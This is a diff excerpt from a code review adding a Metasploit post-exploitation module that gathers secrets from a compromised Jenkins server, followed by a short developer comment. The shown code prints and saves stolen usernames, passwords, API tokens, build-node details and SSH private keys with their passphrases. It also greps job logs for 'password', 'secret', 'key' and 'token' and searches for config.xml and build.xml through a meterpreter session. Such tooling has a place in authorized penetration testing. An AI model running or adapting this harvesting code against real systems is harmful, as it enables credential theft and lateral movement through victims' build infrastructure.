modules/post/multi/gather/jenkins_gather.rb

```diff
@@ -0,0 +1,433 @@
+    store_loot("job-#{fname}", 'text/plain', session, f, nil, nil) if datastore['STORE_LOOT']
+  end
+
+  def pretty_print_gathered
+    creds_table = Rex::Text::Table.new(
+      'Header'  => 'Creds',
+      'Indent'  => 1,
+      'Columns' =>
+        [
+          'Username',
+          'Password',
+          'Description'
+        ]
+    )
+    @creds.uniq.each { |e| creds_table << e }
+    print_good("\n" + creds_table.to_s) unless creds_table.rows.count.zero?
+    store_loot('all.creds.csv', 'text/plain', session, creds_table.to_csv, nil, nil) if datastore['STORE_LOOT']
+
+    api_table = Rex::Text::Table.new(
+      'Header'  => 'API Keys',
+      'Indent'  => 1,
+      'Columns' =>
+        [
+          'Username',
+          'API Tokens'
+        ]
+    )
+    @api_tokens.uniq.each { |e| api_table << e }
+    print_good("\n" + api_table.to_s) unless api_table.rows.count.zero?
+    store_loot('all.apitokens.csv', 'text/plain', session, api_table.to_csv, nil, nil) if datastore['STORE_LOOT']
+
+    node_table = Rex::Text::Table.new(
+      'Header'  => 'Nodes',
+      'Indent'  => 1,
+      'Columns' =>
+        [
+          'Node Name',
+          'Hostname',
+          'Port',
+          'Description',
+          'Cred Id'
+        ]
+    )
+    @nodes.uniq.each { |e| node_table << e }
+    print_good("\n" + node_table.to_s) unless node_table.rows.count.zero?
+    store_loot('all.nodes.csv', 'text/plain', session, node_table.to_csv, nil, nil) if datastore['STORE_LOOT']
+
+    @ssh_keys.uniq.each do |e|
+      print_good("SSH Key")
+      print_status(" ID: #{e[0]}")
+      print_status(" Description: #{e[1]}") unless e[1].nil? || e[1].empty?
+      print_status(" Passphrase:  #{e[2]}") unless e[2].nil? || e[2].empty?
+      print_status(" Username:    #{e[3]}") unless e[3].nil? || e[3].empty?
+      print_status("\n#{e[4]}")
+    end
+    ssh_output = @ssh_keys.each { |e| e.join(",") + "\n\n\n" }
+    store_loot('all.sshkeys', 'text/plain', session, ssh_output, nil, nil) if datastore['STORE_LOOT'] && !ssh_output.empty?
+  end
+
+  def grep_job_history(path, platform)
+    print_status("Searching through job history for interesting keywords...")
+    case platform
+    when "windows"
+      results = cmd_exec("cmd.exe", "/c findstr /s /i \"secret key token password\" \"#{path}*log\"")
+    when 'nix'
+      results = cmd_exec("/bin/egrep", "-ir \"password|secret|key\" --include log \"#{path}\"")
+    end
+    store_loot('jobhistory.truffles', 'text/plain', session, results, nil, nil) if datastore['STORE_LOOT'] && !results.empty?
+    print_good("Job Log truffles:\n#{results}") unless results.empty?
+  end
+
+  def find_configs(path, platform)
+    case platform
+
+    when 'windows'
+      case session.type
+      when 'meterpreter'
+        configs = ""
+        c = session.fs.file.search(path,"config.xml", recurse = true, timeout = -1).concat(session.fs.file.search(path, "build.xml", recurse = true, timeout = -1))
```

Comment:
Split to multiple lines. Yeah, no reason aside from me not knowing the APIs and including the variable purpose. I can clean it up.